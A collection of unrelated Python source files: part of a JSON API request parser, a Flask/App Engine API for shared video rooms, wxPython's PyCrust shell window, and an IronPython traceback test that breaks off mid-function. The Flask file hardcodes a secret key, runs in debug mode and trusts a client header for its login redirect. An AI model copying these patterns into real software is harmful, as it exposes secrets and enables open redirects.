media_type = 'application/vnd.api+json'
renderer_class = JSONAPIRenderer
# Overrides JSONParser
def flatten_relationships(self, relationships):
"""
Flattens relationships dictionary which has information needed to create related resource objects.
Validates that formatting of relationships dictionary is correct.
"""
if not isinstance(relationships, dict):
raise ParseError()
# Can only create one type of relationship.
        related_resource = list(relationships.keys())[0]
if not isinstance(relationships[related_resource], dict) or related_resource == 'data':
raise ParseError()
data = relationships[related_resource].get('data')
if not data:
raise JSONAPIException(source={'pointer': 'data/relationships/{}/data'.format(related_resource)}, detail=NO_DATA_ERROR)
target_type = data.get('type')
if not target_type:
raise JSONAPIException(source={'pointer': 'data/relationships/{}/data/type'.format(related_resource)}, detail=NO_TYPE_ERROR)
id = data.get('id')
return {'id': id, 'target_type': target_type}
def flatten_data(self, resource_object, parser_context, is_list):
"""
Flattens data objects, making attributes and relationships fields the same level as id and type.
"""
relationships = resource_object.get('relationships')
is_relationship = parser_context.get('is_relationship')
attributes_required = parser_context.get('attributes_required', True)
request_method = parser_context['request'].method
# Request must include "relationships" or "attributes"
if is_relationship and request_method == 'POST':
if not relationships:
raise JSONAPIException(source={'pointer': '/data/relationships'}, detail=NO_RELATIONSHIPS_ERROR)
else:
if 'attributes' not in resource_object and attributes_required and request_method != 'DELETE':
raise JSONAPIException(source={'pointer': '/data/attributes'}, detail=NO_ATTRIBUTES_ERROR)
object_id = resource_object.get('id')
object_type = resource_object.get('type')
# For validating type and id for bulk delete:
if is_list and request_method == 'DELETE':
if object_id is None:
raise JSONAPIException(source={'pointer': '/data/id'}, detail=NO_ID_ERROR)
if object_type is None:
raise JSONAPIException(source={'pointer': '/data/type'}, detail=NO_TYPE_ERROR)
attributes = resource_object.get('attributes')
parsed = {'id': object_id, 'type': object_type}
if attributes:
parsed.update(attributes)
if relationships:
relationships = self.flatten_relationships(relationships)
parsed.update(relationships)
return parsed
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as JSON and returns the resulting data.
"""
result = super(JSONAPIParser, self).parse(stream, media_type=media_type, parser_context=parser_context)
if not isinstance(result, dict):
raise ParseError()
data = result.get('data', {})
if data:
if is_bulk_request(parser_context['request']):
if not isinstance(data, list):
raise ParseError('Expected a list of items but got type "dict".')
data_collection = []
data_collection.extend([self.flatten_data(data_object, parser_context, is_list=True) for data_object in data])
return data_collection
else:
if not isinstance(data, collections.Mapping):
raise ParseError('Expected a dictionary of items.')
return self.flatten_data(data, parser_context, is_list=False)
else:
raise JSONAPIException(source={'pointer': '/data'}, detail=NO_DATA_ERROR)
class JSONAPIParserForRegularJSON(JSONAPIParser):
"""
Allows same processing as JSONAPIParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIRelationshipParser(JSONParser):
"""
Parses JSON-serialized data for relationship endpoints. Overrides media_type.
"""
media_type = 'application/vnd.api+json'
def parse(self, stream, media_type=None, parser_context=None):
res = super(JSONAPIRelationshipParser, self).parse(stream, media_type, parser_context)
if not isinstance(res, dict):
raise ParseError('Request body must be dictionary')
data = res.get('data')
if data:
if not isinstance(data, list):
raise ParseError('Data must be an array')
for i, datum in enumerate(data):
if datum.get('id') is None:
raise JSONAPIException(source={'pointer': '/data/{}/id'.format(str(i))}, detail=NO_ID_ERROR)
if datum.get('type') is None:
raise JSONAPIException(source={'pointer': '/data/{}/type'.format(str(i))}, detail=NO_TYPE_ERROR)
return {'data': data}
return {'data': []}
class JSONAPIRelationshipParserForRegularJSON(JSONAPIRelationshipParser):
"""
Allows same processing as JSONAPIRelationshipParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIOnetoOneRelationshipParser(JSONParser):
"""
Parses JSON-serialized data for relationship endpoints. Overrides media_type.
"""
media_type = 'application/vnd.api+json'
def parse(self, stream, media_type=None, parser_context=None):
res = super(JSONAPIOnetoOneRelationshipParser, self).parse(stream, media_type, parser_context)
if not isinstance(res, dict):
raise ParseError('Request body must be dictionary')
data = res.get('data')
if data:
id_ = data.get('id')
type_ = data.get('type')
if id_ is None:
raise JSONAPIException(source={'pointer': '/data/id'}, detail=NO_ID_ERROR)
if type_ is None:
raise JSONAPIException(source={'pointer': '/data/type'}, detail=NO_TYPE_ERROR)
return data
return {'type': None, 'id': None}
class JSONAPIOnetoOneRelationshipParserForRegularJSON(JSONAPIOnetoOneRelationshipParser):
"""
Allows same processing as JSONAPIRelationshipParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIMultipleRelationshipsParser(JSONAPIParser):
def flatten_relationships(self, relationships):
rel = {}
for resource in relationships:
ret = super(JSONAPIMultipleRelationshipsParser, self).flatten_relationships({resource: relationships[resource]})
if ret.get('target_type') and ret.get('id'):
rel[resource] = ret['id']
return rel
class JSONAPIMultipleRelationshipsParserForRegularJSON(JSONAPIParserForRegularJSON):
def flatten_relationships(self, relationships):
ret = super(JSONAPIMultipleRelationshipsParserForRegularJSON, self).flatten_relationships(relationships)
        related_resource = list(relationships.keys())[0]
if ret.get('target_type') and ret.get('id'):
return {related_resource: ret['id']}
return ret
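# Usage sketch (illustrative): the flat dictionary flatten_data() builds from
# a typical JSON API resource object. The request stub is hypothetical; in
# practice Django REST framework supplies the parser_context.
def _example_flatten():
    class FakeRequest(object):
        method = 'POST'
    resource_object = {
        'type': 'nodes',
        'attributes': {'title': 'My project'},
    }
    flat = JSONAPIParser().flatten_data(
        resource_object, {'request': FakeRequest()}, is_list=False)
    assert flat == {'id': None, 'type': 'nodes', 'title': 'My project'}
    return flat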
|
|
#!/usr/bin/env python
#
# Copyright 2014 Chundong Wang
#
import logging
import json
import os
import flask
import time
from datetime import datetime,timedelta
import traceback
from model import DateTimeEncoder,Room
from flask import render_template,abort
from google.appengine.api import users
from google.appengine.api import memcache
app = flask.Flask(__name__, template_folder='webapp')
app.config.update(dict(
DEBUG=True,
SECRET_KEY='t0&&r1o-uf=+5e$)3#p+)9m^qc)5zklxr7%ork7k7sm@*hmok5'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
_is_local = os.environ['SERVER_SOFTWARE'].startswith('Development')
def isLocal():
return _is_local
def json_succ(extra=None,data=None):
resp = {"result":"SUCCEED"}
if extra is not None:
resp["extra"]=extra
if data is not None:
resp["data"]=data
return json_response(resp)
class Reason:
ROOM_NAME_REQUIRED=1
EXIST_ROOM_NAME=2
NO_ROOM_FOUND=3
LOGIN_REQUIRED=401
INVALID_PARAMETER=400
FORBIDDEN_OPERATION=403
def caller(up=0):
'''Get file name, line number, function name and
source text of the caller's caller as 4-tuple:
(file, line, func, text).
The optional argument 'up' allows retrieval of
a caller further back up into the call stack.
Note, the source text may be None and function
name may be '?' in the returned result. In
Python 2.3+ the file name may be an absolute
path.
'''
try: # just get a few frames
f = traceback.extract_stack(limit=up+2)
if f:
return f[0]
except:
if isLocal():
traceback.print_exc()
pass
# running with psyco?
return ('', 0, '', None)
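# Illustrative note (file name and line number assumed): when json_fail() below
# calls caller(up=1), the returned 4-tuple describes json_fail's own caller,
# e.g. ('main.py', 1234, 'room_api', 'return json_fail(Reason.NO_ROOM_FOUND)'),
# which is exactly what the logging.warning call in json_fail formats.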
def json_fail(reason=None,extra=None,data=None):
resp = {"result":"FAILED"}
if reason is not None:
resp["reason"]=reason
if extra is not None:
resp["extra"]=extra
if data is not None:
resp["data"]=data
if isLocal():
(filename, line, func, text) = caller(up=1)
        logging.warning('error[%d] occurred in %s:%s, %s.'%(reason, filename, line, func))
if reason == Reason.LOGIN_REQUIRED:
abort(401)
return json_response(resp)
def json_response(obj):
response = flask.make_response(json.dumps(obj, cls=DateTimeEncoder))
response.headers['Content-Type'] = 'application/json'
response.headers['mimetype'] = 'application/json'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
return response
def update_current_time(room):
if room.state == "PLAYING":
real_current_time = timedelta(seconds=room.current_time) + (datetime.now()-room.last_update)
room.current_time = int(real_current_time.total_seconds())
return room
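# Illustrative example: if a PLAYING room was stored with current_time=100 and
# last_update 30 seconds ago, update_current_time() reports 130, i.e. the
# position as if playback had kept running on the server.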
def get_return_url(request):
return_url = request.referrer
if "X-continue-url" in request.headers:
return_url = request.headers["X-continue-url"]
return return_url
@app.route('/room', methods=['GET', 'POST'])
@app.route('/room/<room_name>', methods=['GET', 'PUT', 'DELETE'])
def room_api(room_name=None):
user = users.get_current_user()
if flask.request.method == 'GET':
if room_name is None:
rooms = []
if not user:
rooms = Room.fetch_all_anonymous()
else:
rooms = Room.fetch_all()
for room in rooms:
update_current_time(room)
return json_response([room.to_dict() for room in rooms])
else:
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
update_current_time(room)
return json_response(room.to_dict())
elif flask.request.method == 'POST':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
else:
room_info = flask.request.get_json(silent=True)
if room_info is None:
return json_fail(Reason.INVALID_PARAMETER)
if "name" not in room_info:
return json_fail(Reason.ROOM_NAME_REQUIRED)
room = Room.fetch_by_name(room_info["name"])
logging.info('create_room(%s):%s'%(room_info["name"],room.__class__.__name__))
if room is not None:
return json_fail(Reason.EXIST_ROOM_NAME)
room = Room(creator_email=user.email(), name=room_info["name"])
if "current_time" in room_info:
room.current_time=int(room_info["current_time"])
if "cover" in room_info:
room.cover=room_info["cover"]
room.put()
update_current_time(room)
return json_succ(data=room.to_dict())
elif flask.request.method == 'PUT':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
logging.info('update_room(%s):%s'%(room_name,room.__class__.__name__))
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
room_info = flask.request.get_json(silent=True)
if room_info is None:
return json_fail(Reason.INVALID_PARAMETER)
if "current_time" in room_info:
room.current_time=int(room_info["current_time"])
if "cover" in room_info:
room.cover=room_info["cover"]
room.put()
return json_succ()
elif flask.request.method == 'DELETE':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
logging.info('delete_room(%s):%s'%(room_name,room.__class__.__name__))
if room is not None:
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
else:
room.key.delete()
return json_succ()
else:
return json_fail(Reason.NO_ROOM_FOUND, room_name)
else:
return json_fail(Reason.INVALID_PARAMETER)
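# Illustrative request sketch (example values assumed, not part of the original app):
#   POST   /room              JSON body {"name": "movie-night", "cover": "http://example.com/c.jpg"}
#   PUT    /room/movie-night  JSON body {"current_time": 42}
#   DELETE /room/movie-night
# All three require a signed-in user, and only the room's creator may modify or delete it.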
@app.route('/room/<room_name>/video', methods=['GET', 'POST', 'PUT'])
@app.route('/room/<room_name>/video/<video_index>', methods=['GET', 'PUT', 'DELETE'])
def video_api(room_name, video_index=None):
user = users.get_current_user()
if flask.request.method == 'GET':
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if video_index is None:
return json_response(room.video_ids)
        elif int(video_index) >= len(room.video_ids):
            return json_fail(Reason.INVALID_PARAMETER)
        else:
            return json_response(room.video_ids[int(video_index)])
elif flask.request.method == 'POST':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
video_info = flask.request.get_json(silent=True)
if video_info is None or "id" not in video_info:
return json_fail(Reason.INVALID_PARAMETER)
        room.video_ids.append(video_info["id"])
room.put()
return json_succ()
elif flask.request.method == 'PUT':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
video_action = flask.request.get_json(silent=True)
if video_action is None:
return json_fail(Reason.INVALID_PARAMETER)
if "op" not in video_action or "current_time" not in video_action or "roundtrip" not in video_action:
return json_fail(Reason.INVALID_PARAMETER)
if video_action["op"] not in ['NOTSTARTED', 'PAUSED', 'PLAYING', 'ENDED']:
return json_fail(Reason.INVALID_PARAMETER)
room.state = video_action["op"]
# Save current_time+roundtrip/2 and last updated time.
# When read, it'll be now()-last_updated_time+current_time+roundtrip/2
room.current_time = int(int(video_action["current_time"]) + float(video_action["roundtrip"])/2)
room.put()
return json_succ()
elif flask.request.method == 'DELETE':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
        # Only the video_id at index 0 can be removed.
video_index = int(video_index)
if video_index != 0:
return json_fail(Reason.INVALID_PARAMETER)
logging.info('delete_video(%s:%d):%s'%(room_name,video_index,room.__class__.__name__))
room.video_ids = room.video_ids[1:]
room.put()
return json_succ()
else:
return json_fail(Reason.INVALID_PARAMETER)
@app.route('/room/<room_name>/current_time', methods=['GET'])
def video_sync_api(room_name):
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
update_current_time(room)
return json_response({"current_time":room.current_time})
@app.route('/auth', methods=['GET'])
def authenticate_api():
user = users.get_current_user()
if user is not None:
return json_response({"user_email":user.email()})
else:
return json_response({"login_url":users.create_login_url(get_return_url(flask.request))})
@app.route('/roundtrip')
@app.route('/roundtrip/<server_timestamp>')
def roundtrip(server_timestamp=None):
if server_timestamp is None:
return json_response({"server_timestamp":float(time.time())})
else:
roundtrip = time.time()-float(server_timestamp)
return json_response({"roundtrip":float(roundtrip)})
@app.errorhandler(400)
def invalid_parameter(error):
return flask.Response('Ajax API raises invalid parameter error.', 400)
@app.errorhandler(401)
def require_login(error):
return_url = get_return_url(flask.request)
logging.info('401:%s' % return_url)
login_url = users.create_login_url(return_url)
    return flask.Response('Ajax APIs require the user to <a href="%s">login</a> first.' % login_url, 401,
{'WWW-Authenticate':'Basic realm="Login Required"','LoginUrl':login_url})
@app.errorhandler(404)
def page_not_found(error):
return flask.Response('Sorry, nothing at this URL.', 404)
if __name__ == '__main__':
app.run()
|
|
"""Crust combines the shell and filling into one control."""
__author__ = "Patrick K. O'Brien <[email protected]>"
__cvsid__ = "$Id: crust.py 44235 2007-01-17 23:05:14Z RD $"
__revision__ = "$Revision: 44235 $"[11:-2]
import wx
import os
import pprint
import re
import sys
import dispatcher
import editwindow
from filling import Filling
import frame
from shell import Shell
from version import VERSION
class Crust(wx.SplitterWindow):
"""Crust based on SplitterWindow."""
name = 'Crust'
revision = __revision__
sashoffset = 300
def __init__(self, parent, id=-1, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.SP_3D|wx.SP_LIVE_UPDATE,
name='Crust Window', rootObject=None, rootLabel=None,
rootIsNamespace=True, intro='', locals=None,
InterpClass=None,
startupScript=None, execStartupScript=True,
*args, **kwds):
"""Create Crust instance."""
wx.SplitterWindow.__init__(self, parent, id, pos, size, style, name)
# Turn off the tab-traversal style that is automatically
# turned on by wx.SplitterWindow. We do this because on
# Windows the event for Ctrl-Enter is stolen and used as a
# navigation key, but the Shell window uses it to insert lines.
style = self.GetWindowStyle()
self.SetWindowStyle(style & ~wx.TAB_TRAVERSAL)
self.shell = Shell(parent=self, introText=intro,
locals=locals, InterpClass=InterpClass,
startupScript=startupScript,
execStartupScript=execStartupScript,
*args, **kwds)
self.editor = self.shell
if rootObject is None:
rootObject = self.shell.interp.locals
self.notebook = wx.Notebook(parent=self, id=-1)
self.shell.interp.locals['notebook'] = self.notebook
self.filling = Filling(parent=self.notebook,
rootObject=rootObject,
rootLabel=rootLabel,
rootIsNamespace=rootIsNamespace)
# Add 'filling' to the interpreter's locals.
self.shell.interp.locals['filling'] = self.filling
self.notebook.AddPage(page=self.filling, text='Namespace', select=True)
self.display = Display(parent=self.notebook)
self.notebook.AddPage(page=self.display, text='Display')
# Add 'pp' (pretty print) to the interpreter's locals.
self.shell.interp.locals['pp'] = self.display.setItem
self.display.nbTab = self.notebook.GetPageCount()-1
self.calltip = Calltip(parent=self.notebook)
self.notebook.AddPage(page=self.calltip, text='Calltip')
self.sessionlisting = SessionListing(parent=self.notebook)
self.notebook.AddPage(page=self.sessionlisting, text='History')
self.dispatcherlisting = DispatcherListing(parent=self.notebook)
self.notebook.AddPage(page=self.dispatcherlisting, text='Dispatcher')
# Initialize in an unsplit mode, and check later after loading
# settings if we should split or not.
self.shell.Hide()
self.notebook.Hide()
self.Initialize(self.shell)
self._shouldsplit = True
wx.CallAfter(self._CheckShouldSplit)
self.SetMinimumPaneSize(100)
self.Bind(wx.EVT_SIZE, self.SplitterOnSize)
self.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.OnChanged)
self.Bind(wx.EVT_SPLITTER_DCLICK, self.OnSashDClick)
def _CheckShouldSplit(self):
if self._shouldsplit:
self.SplitHorizontally(self.shell, self.notebook, -self.sashoffset)
self.lastsashpos = self.GetSashPosition()
else:
self.lastsashpos = -1
self.issplit = self.IsSplit()
def ToggleTools(self):
"""Toggle the display of the filling and other tools"""
if self.issplit:
self.Unsplit()
else:
self.SplitHorizontally(self.shell, self.notebook, -self.sashoffset)
self.lastsashpos = self.GetSashPosition()
self.issplit = self.IsSplit()
def ToolsShown(self):
return self.issplit
def OnChanged(self, event):
"""update sash offset from the bottom of the window"""
self.sashoffset = self.GetSize().height - event.GetSashPosition()
self.lastsashpos = event.GetSashPosition()
event.Skip()
def OnSashDClick(self, event):
self.Unsplit()
self.issplit = False
# Make the splitter expand the top window when resized
def SplitterOnSize(self, event):
splitter = event.GetEventObject()
sz = splitter.GetSize()
splitter.SetSashPosition(sz.height - self.sashoffset, True)
event.Skip()
def LoadSettings(self, config):
self.shell.LoadSettings(config)
self.filling.LoadSettings(config)
pos = config.ReadInt('Sash/CrustPos', 400)
wx.CallAfter(self.SetSashPosition, pos)
def _updateSashPosValue():
sz = self.GetSize()
self.sashoffset = sz.height - self.GetSashPosition()
wx.CallAfter(_updateSashPosValue)
zoom = config.ReadInt('View/Zoom/Display', -99)
if zoom != -99:
self.display.SetZoom(zoom)
self.issplit = config.ReadInt('Sash/IsSplit', True)
if not self.issplit:
self._shouldsplit = False
def SaveSettings(self, config):
self.shell.SaveSettings(config)
self.filling.SaveSettings(config)
if self.lastsashpos != -1:
config.WriteInt('Sash/CrustPos', self.lastsashpos)
config.WriteInt('Sash/IsSplit', self.issplit)
config.WriteInt('View/Zoom/Display', self.display.GetZoom())
class Display(editwindow.EditWindow):
"""STC used to display an object using Pretty Print."""
def __init__(self, parent, id=-1, pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.CLIP_CHILDREN | wx.SUNKEN_BORDER,
static=False):
"""Create Display instance."""
editwindow.EditWindow.__init__(self, parent, id, pos, size, style)
# Configure various defaults and user preferences.
self.SetReadOnly(True)
self.SetWrapMode(False)
if not static:
dispatcher.connect(receiver=self.push, signal='Interpreter.push')
def push(self, command, more):
"""Receiver for Interpreter.push signal."""
self.Refresh()
def Refresh(self):
if not hasattr(self, "item"):
return
self.SetReadOnly(False)
text = pprint.pformat(self.item)
self.SetText(text)
self.SetReadOnly(True)
def setItem(self, item):
"""Set item to pretty print in the notebook Display tab."""
self.item = item
self.Refresh()
if self.GetParent().GetSelection() != self.nbTab:
focus = wx.Window.FindFocus()
self.GetParent().SetSelection(self.nbTab)
wx.CallAfter(focus.SetFocus)
# TODO: Switch this to an editwindow.EditWindow
class Calltip(wx.TextCtrl):
"""Text control containing the most recent shell calltip."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_RICH2)
wx.TextCtrl.__init__(self, parent, id, style=style)
self.SetBackgroundColour(wx.Colour(255, 255, 208))
dispatcher.connect(receiver=self.display, signal='Shell.calltip')
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def display(self, calltip):
"""Receiver for Shell.calltip signal."""
## self.SetValue(calltip) # Caused refresh problem on Windows.
self.Clear()
self.AppendText(calltip)
# TODO: Switch this to an editwindow.EditWindow
class SessionListing(wx.TextCtrl):
"""Text control containing all commands for session."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY |
wx.TE_RICH2 | wx.TE_DONTWRAP)
wx.TextCtrl.__init__(self, parent, id, style=style)
dispatcher.connect(receiver=self.addHistory, signal="Shell.addHistory")
dispatcher.connect(receiver=self.clearHistory, signal="Shell.clearHistory")
dispatcher.connect(receiver=self.loadHistory, signal="Shell.loadHistory")
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def loadHistory(self, history):
# preload the existing history, if any
hist = history[:]
hist.reverse()
self.SetValue('\n'.join(hist) + '\n')
self.SetInsertionPointEnd()
def addHistory(self, command):
if command:
self.SetInsertionPointEnd()
self.AppendText(command + '\n')
def clearHistory(self):
self.SetValue("")
class DispatcherListing(wx.TextCtrl):
"""Text control containing all dispatches for session."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY |
wx.TE_RICH2 | wx.TE_DONTWRAP)
wx.TextCtrl.__init__(self, parent, id, style=style)
dispatcher.connect(receiver=self.spy)
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def spy(self, signal, sender):
"""Receiver for Any signal from Any sender."""
text = '%r from %s' % (signal, sender)
self.SetInsertionPointEnd()
start, end = self.GetSelection()
if start != end:
self.SetSelection(0, 0)
self.AppendText(text + '\n')
class CrustFrame(frame.Frame, frame.ShellFrameMixin):
"""Frame containing all the PyCrust components."""
name = 'CrustFrame'
revision = __revision__
def __init__(self, parent=None, id=-1, title='PyCrust',
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE,
rootObject=None, rootLabel=None, rootIsNamespace=True,
locals=None, InterpClass=None,
config=None, dataDir=None,
*args, **kwds):
"""Create CrustFrame instance."""
frame.Frame.__init__(self, parent, id, title, pos, size, style)
frame.ShellFrameMixin.__init__(self, config, dataDir)
if size == wx.DefaultSize:
self.SetSize((800, 600))
intro = 'PyCrust %s - The Flakiest Python Shell' % VERSION
self.SetStatusText(intro.replace('\n', ', '))
self.crust = Crust(parent=self, intro=intro,
rootObject=rootObject,
rootLabel=rootLabel,
rootIsNamespace=rootIsNamespace,
locals=locals,
InterpClass=InterpClass,
startupScript=self.startupScript,
execStartupScript=self.execStartupScript,
*args, **kwds)
self.shell = self.crust.shell
# Override the filling so that status messages go to the status bar.
self.crust.filling.tree.setStatusText = self.SetStatusText
# Override the shell so that status messages go to the status bar.
self.shell.setStatusText = self.SetStatusText
self.shell.SetFocus()
self.LoadSettings()
def OnClose(self, event):
"""Event handler for closing."""
self.SaveSettings()
self.crust.shell.destroy()
self.Destroy()
def OnAbout(self, event):
"""Display an About window."""
title = 'About PyCrust'
text = 'PyCrust %s\n\n' % VERSION + \
'Yet another Python shell, only flakier.\n\n' + \
'Half-baked by Patrick K. O\'Brien,\n' + \
'the other half is still in the oven.\n\n' + \
'Shell Revision: %s\n' % self.shell.revision + \
'Interpreter Revision: %s\n\n' % self.shell.interp.revision + \
'Platform: %s\n' % sys.platform + \
'Python Version: %s\n' % sys.version.split()[0] + \
'wxPython Version: %s\n' % wx.VERSION_STRING + \
('\t(%s)\n' % ", ".join(wx.PlatformInfo[1:]))
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def ToggleTools(self):
"""Toggle the display of the filling and other tools"""
return self.crust.ToggleTools()
def ToolsShown(self):
return self.crust.ToolsShown()
def OnHelp(self, event):
"""Show a help dialog."""
frame.ShellFrameMixin.OnHelp(self, event)
def LoadSettings(self):
if self.config is not None:
frame.ShellFrameMixin.LoadSettings(self)
frame.Frame.LoadSettings(self, self.config)
self.crust.LoadSettings(self.config)
def SaveSettings(self, force=False):
if self.config is not None:
frame.ShellFrameMixin.SaveSettings(self)
if self.autoSaveSettings or force:
frame.Frame.SaveSettings(self, self.config)
self.crust.SaveSettings(self.config)
def DoSaveSettings(self):
if self.config is not None:
self.SaveSettings(force=True)
self.config.Flush()
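# Illustrative usage sketch (not part of the original module):
#
#   if __name__ == '__main__':
#       app = wx.App(False)
#       crust_frame = CrustFrame()
#       crust_frame.Show()
#       app.MainLoop()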
|
|
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# !!! DO NOT MOVE OR CHANGE THE FOLLOWING LINES
def _raise_exception():
raise Exception()
_retb = (18, 0, 'test_traceback.py', '_raise_exception')
from iptest.assert_util import *
from iptest.file_util import *
import imp
if not is_cli: import os
def _raise_exception_with_finally():
try:
raise Exception()
finally:
pass
_rewftb= (27, 0, 'test_traceback.py', '_raise_exception_with_finally')
def assert_traceback(expected):
import sys
tb = sys.exc_info()[2]
if expected is None:
AreEqual(None, expected)
else:
tb_list = []
while tb is not None :
f = tb.tb_frame
co = f.f_code
filename = co.co_filename.lower()
name = co.co_name
tb_list.append((tb.tb_lineno, tb.tb_lasti, filename, name))
tb = tb.tb_next
#print tb_list
AreEqual(len(tb_list), len(expected))
for x in range(len(expected)):
AreEqual(tb_list[x][0], expected[x][0])
AreEqual(tb_list[x][2:], expected[x][2:])
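# Note: each expected entry is a (lineno, lasti, filename, funcname) tuple; the
# comparison above checks indices 0 and 2: only, so the lasti values in the
# expectations below are effectively placeholders.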
def test_no_traceback():
#assert_traceback(None)
try:
_raise_exception()
except:
pass
assert_traceback(None)
FILE="test_traceback.py"
LINE100 = 70
def test_catch_others_exception():
try:
_raise_exception()
except:
assert_traceback([(LINE100 + 2, 0, FILE, 'test_catch_others_exception'), _retb])
LINE110 = 78
def test_catch_its_own_exception():
try:
raise Exception()
except:
assert_traceback([(LINE110 + 2, 0, FILE, 'test_catch_its_own_exception')])
LINE120 = 86
def test_catch_others_exception_with_finally():
try:
_raise_exception_with_finally()
except:
assert_traceback([(LINE120 + 2, 0, FILE, 'test_catch_others_exception_with_finally'), _rewftb])
LINE130 = 94
def test_nested_caught_outside():
try:
x = 2
try:
_raise_exception()
except NameError:
Assert(False, "unhittable")
y = 2
except:
assert_traceback([(LINE130 + 4, 0, FILE, 'test_nested_caught_outside'), _retb])
LINE140 = 108
def test_nested_caught_inside():
try:
x = 2
try:
_raise_exception()
except:
assert_traceback([(LINE140 + 4, 0, FILE, 'test_nested_caught_inside'), _retb])
y = 2
except:
assert_traceback(None)
LINE150 = 120
def test_throw_in_except():
try:
_raise_exception()
except:
assert_traceback([(LINE150+2, 0, FILE, 'test_throw_in_except'), _retb])
try:
assert_traceback([(LINE150+2, 0, FILE, 'test_throw_in_except'), _retb])
_raise_exception()
except:
assert_traceback([(LINE150+7, 0, FILE, 'test_throw_in_except'), _retb])
assert_traceback([(LINE150+7, 0, FILE, 'test_throw_in_except'), _retb])
LINE160 = 134
class C1:
def M(self):
try:
_raise_exception()
except:
assert_traceback([(LINE160 + 3, 0, FILE, 'M'), _retb])
def test_throw_in_method():
c = C1()
c.M()
LINE170 = 147
def test_throw_when_defining_class():
class C2(object):
try:
_raise_exception()
except:
assert_traceback([(LINE170 + 3, 0, FILE, 'C2'), _retb])
def throw_when_defining_class_directly():
class C3(C1):
_raise_exception()
LINE180 = 160
def test_throw_when_defining_class_directly():
try:
throw_when_defining_class_directly()
except:
assert_traceback([(LINE180 + 2, 0, FILE, 'test_throw_when_defining_class_directly'),
(LINE180 - 5, 0, FILE, 'throw_when_defining_class_directly'),
(LINE180 - 4, 0, FILE, 'C3'), _retb])
LINE200 = 169
def test_compiled_code():
try:
codeobj = compile('\nraise Exception()', '<mycode>', 'exec')
exec(codeobj, {})
except:
assert_traceback([(LINE200+3, 0, FILE, 'test_compiled_code'), (2, 0, '<mycode>', '<module>')])
def generator_throw_before_yield():
_raise_exception()
yield 1
LINE210 = 181
def test_throw_before_yield():
try:
for x in generator_throw_before_yield():
pass
except:
assert_traceback([(LINE210+3, 0, FILE, 'test_throw_before_yield'), (LINE210-4, 2, 'test_traceback.py', 'generator_throw_before_yield'), _retb])
def generator_throw_after_yield():
yield 1
_raise_exception()
LINE220 = 194
def test_throw_while_yield():
try:
for x in generator_throw_while_yield():
pass
except:
assert_traceback([(LINE220+3, 0, FILE, 'test_throw_while_yield')])
def generator_yield_inside_try():
try:
yield 1
yield 2
_raise_exception()
except NameError:
pass
LINE230 = 211
def test_yield_inside_try():
try:
for x in generator_yield_inside_try():
pass
except:
assert_traceback([(LINE230+3, 0, FILE, 'test_yield_inside_try'), (LINE230-5, 2, 'test_traceback.py', 'generator_yield_inside_try'), _retb])
LINE240 = 221
def test_throw_and_throw():
try:
_raise_exception()
except:
assert_traceback([(LINE240 + 2, 0, FILE, 'test_throw_and_throw'), _retb])
try:
_raise_exception()
except:
assert_traceback([(LINE240 + 6, 0, FILE, 'test_throw_and_throw'), _retb])
LINE250 = 233
def test_throw_in_another_file():
if is_cli: _f_file = path_combine(get_full_dir_name(testpath.public_testdir), 'foo.py')
else: _f_file = os.getcwd() + '\\foo.py'
write_to_file(_f_file, '''
def another_raise():
raise Exception()
''')
